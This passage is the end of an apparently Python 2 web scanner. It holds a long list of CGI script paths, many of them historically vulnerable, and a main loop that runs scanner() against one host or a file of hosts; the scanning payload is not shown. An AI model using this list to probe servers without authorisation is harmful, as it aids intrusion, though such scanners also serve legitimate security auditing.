'/cgi-bin/title.cgi', '/cgi-bin/traffic.cgi', '/cgi-bin/troops.cgi', '/cgi-bin/ttawebtop.cgi/', '/cgi-bin/ultraboard.cgi', '/cgi-bin/upload.cgi', '/cgi-bin/urlcount.cgi', '/cgi-bin/viewcvs.cgi', '/cgi-bin/viralator.cgi', '/cgi-bin/virgil.cgi', '/cgi-bin/vote.cgi', '/cgi-bin/vpasswd.cgi', '/cgi-bin/way-board.cgi', '/cgi-bin/way-board/way-board.cgi', '/cgi-bin/webbbs.cgi', '/cgi-bin/webcart/webcart.cgi', '/cgi-bin/webdist.cgi', '/cgi-bin/webif.cgi', '/cgi-bin/webmail/html/emumail.cgi', '/cgi-bin/webmap.cgi', '/cgi-bin/webspirs.cgi', '/cgi-bin/whois.cgi', '/cgi-bin/whois/whois.cgi', '/cgi-bin/whois_raw.cgi', '/cgi-bin/wrap', '/cgi-bin/wrap.cgi', '/cgi-bin/wwwboard.cgi.cgi', '/cgi-bin/YaBB/YaBB.cgi', '/cgi-bin/zml.cgi', '/cgi-sys/addalink.cgi', '/cgi-sys/defaultwebpage.cgi', '/cgi-sys/domainredirect.cgi', '/cgi-sys/entropybanner.cgi', '/cgi-sys/entropysearch.cgi', '/cgi-sys/FormMail-clone.cgi', '/cgi-sys/helpdesk.cgi', '/cgi-sys/mchat.cgi', '/cgi-sys/randhtml.cgi', '/cgi-sys/realhelpdesk.cgi', '/cgi-sys/realsignup.cgi', '/cgi-sys/signup.cgi', '/cgis/wwwboard/wwwboard.cgi', '/connector.cgi', '/cp/rac/nsManager.cgi', '/create_release.sh', '/CSNews.cgi', '/csPassword.cgi', '/dcadmin.cgi', '/dcboard.cgi', '/dcforum.cgi', '/dcforum/dcforum.cgi', '/debug.cgi', '/details.cgi', '/edittag/edittag.cgi', '/emumail.cgi', '/enter_bug.cgi', '/ez2000/ezadmin.cgi', '/ez2000/ezboard.cgi', '/ez2000/ezman.cgi', '/fcgi-bin/echo', '/fcgi-bin/echo2', '/Gozila.cgi', '/hitmatic/analyse.cgi', '/html/cgi-bin/cgicso', '/index.cgi', '/info.cgi', '/infosrch.cgi', '/login.cgi', '/mailview.cgi', '/main.cgi', '/megabook/admin.cgi', '/ministats/admin.cgi', '/mods/apage/apage.cgi', '/musicqueue.cgi', '/ncbook.cgi', '/newpro.cgi', '/newsletter.sh', '/oem_webstage/cgi-bin/oemapp_cgi', '/page.cgi', '/parse_xml.cgi', '/photo/manage.cgi', '/photodata/manage.cgi', '/print.cgi', '/process_bug.cgi', '/pub/english.cgi', '/quikmail/nph-emumail.cgi', '/quikstore.cgi', '/reviews/newpro.cgi', '/ROADS/cgi-bin/search.pl', '/sample01.cgi', '/sample02.cgi', '/sample03.cgi', '/sample04.cgi', '/sampleposteddata.cgi', '/scancfg.cgi', '/servers/link.cgi', '/setpasswd.cgi', '/SetSecurity.shm', '/shop/member_html.cgi', '/shop/normal_html.cgi', '/site_searcher.cgi', '/siteUserMod.cgi', '/submit.cgi', '/technote/print.cgi', '/template.cgi', '/test.cgi', '/upload.cgi', '/userreg.cgi', '/users/scripts/submit.cgi', '/Web_Store/web_store.cgi', '/webtools/bonsai/ccvsblame.cgi', '/webtools/bonsai/cvsblame.cgi', '/webtools/bonsai/cvslog.cgi', '/webtools/bonsai/cvsquery.cgi', '/webtools/bonsai/cvsqueryform.cgi', '/webtools/bonsai/showcheckins.cgi', '/wwwadmin.cgi', '/wwwboard.cgi', '/wwwboard/wwwboard.cgi'] 33 | 34 | if (RHOSTS == None) and (RHOST == None): 35 | print parser.usage 36 | sys.exit(0) 37 | 38 | if RHOSTS: 39 | for RHOST in open(RHOSTS, 'r'): 40 | scanner(RHOST) 41 | if RHOST: 42 | scanner(RHOST) 43 | 44 | if __name__=="__main__": 45 | main() 46 | --------------------------------------------------------------------------------